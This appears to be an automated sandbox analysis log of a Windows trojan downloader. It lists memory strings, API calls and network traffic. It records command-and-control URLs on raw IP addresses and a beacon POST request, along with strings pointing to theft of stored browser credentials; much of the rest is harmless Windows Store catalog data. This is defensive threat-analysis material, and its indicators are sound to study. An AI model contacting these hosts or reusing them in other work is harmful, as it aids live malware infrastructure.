              Source: svchost.exe, 00000017.00000003.505052140.0000013EC0B1F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","/m equals www.twitter.com (Twitter)
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
              Source: svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
              Source: svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
              Source: PlayToStatusProvider.exe, 00000001.00000003.375062507.0000000003DC0000.00000040.00000001.sdmp, PlayToStatusProvider.exe, 0000000D.00000002.371834115.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: PlayToStatusProvider.exe, 00000001.00000003.375062507.0000000003DC0000.00000040.00000001.sdmp, PlayToStatusProvider.exe, 0000000D.00000002.371834115.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: PlayToStatusProvider.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: PlayToStatusProvider.exe, 0000000D.00000003.371694877.0000000000A29000.00000004.00000001.sdmp String found in binary or memory: s://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/temp/Office16.x86.en-US.ISOfile:///C:/jbxinitvm.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: PlayToStatusProvider.exe, 0000000D.00000003.371694877.0000000000A29000.00000004.00000001.sdmp String found in binary or memory: s://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/temp/Office16.x86.en-US.ISOfile:///C:/jbxinitvm.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: unknownHTTP traffic detected: POST /ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/ HTTP/1.1Referer: http://185.94.252.13/ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/Content-Type: multipart/form-data; boundary=---------------------------143050135578680User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
              Source: PlayToStatusProvider.exe, 00000001.00000002.535091750.0000000002BC0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/9g7gFFV/NinW5U9mPGA0M/Bo6qnDoWpsmlH/fTLbJmHwPyJFH9Qve/ZKY6zL9FJ52LL/o0Cw35Z
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/T
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/3vdy8/hAPMeeivQqBzG6x5JO/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535141689.0000000002C28000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/6
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/l
              Source: PlayToStatusProvider.exe, 00000001.00000002.535091750.0000000002BC0000.00000004.00000001.sdmpString found in binary or memory: http://71.50.31.38/xnRjTGq5HSmYVwq18Bj/KjF0oHtnzqg/
              Source: PlayToStatusProvider.exe, 00000001.00000003.361373164.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://71.50.31.38/xnRjTGq5HSmYVwq18Bj/KjF0oHtnzqg/(
              Source: PlayToStatusProvider.exe, 00000001.00000003.361373164.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://71.50.31.38/xnRjTGq5HSmYVwq18Bj/KjF0oHtnzqg/R
              Source: PlayToStatusProvider.exe, 00000001.00000002.535169999.0000000002D90000.00000004.00000001.sdmp, PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535169999.0000000002D90000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/rovider.exe2l
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: svchost.exe, 00000017.00000002.516830504.0000013EC0B00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.d
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: svchost.exe, 00000003.00000002.304382632.0000025B3E613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
              Source: PlayToStatusProvider.exe, 0000000D.00000002.371809945.000000000019C000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: PlayToStatusProvider.exe, PlayToStatusProvider.exe, 0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000003.00000003.304167369.0000025B3E645000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000003.00000002.304416725.0000025B3E642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000003.00000002.304416725.0000025B3E642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: https://displaycatalog.mp.microsoft.c
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304167369.0000025B3E645000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
              Source: PlayToStatusProvider.exe, 0000000D.00000003.371694877.0000000000A29000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=000
              Source: PlayToStatusProvider.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: svchost.exe, 00000017.00000003.494838988.0000013EC0B56000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.494802441.0000013EC0B60000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.494749301.0000013EC0B33000.00000004.00000001.sdmpString found in binary or memory: https://picsart.com/privacy-policy?hl=en
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304196410.0000025B3E656000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304196410.0000025B3E656000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000003.00000002.304407756.0000025B3E639000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000003.00000003.304167369.0000025B3E645000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: PlayToStatusProvider.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040FDCB OpenClipboard,GetLastError,DeleteFileW,13_2_0040FDCB
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0040C36D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_0040C36D
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_00414678 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00414678
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_00448AF9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,0_2_00448AF9
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004439D4 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_004439D4
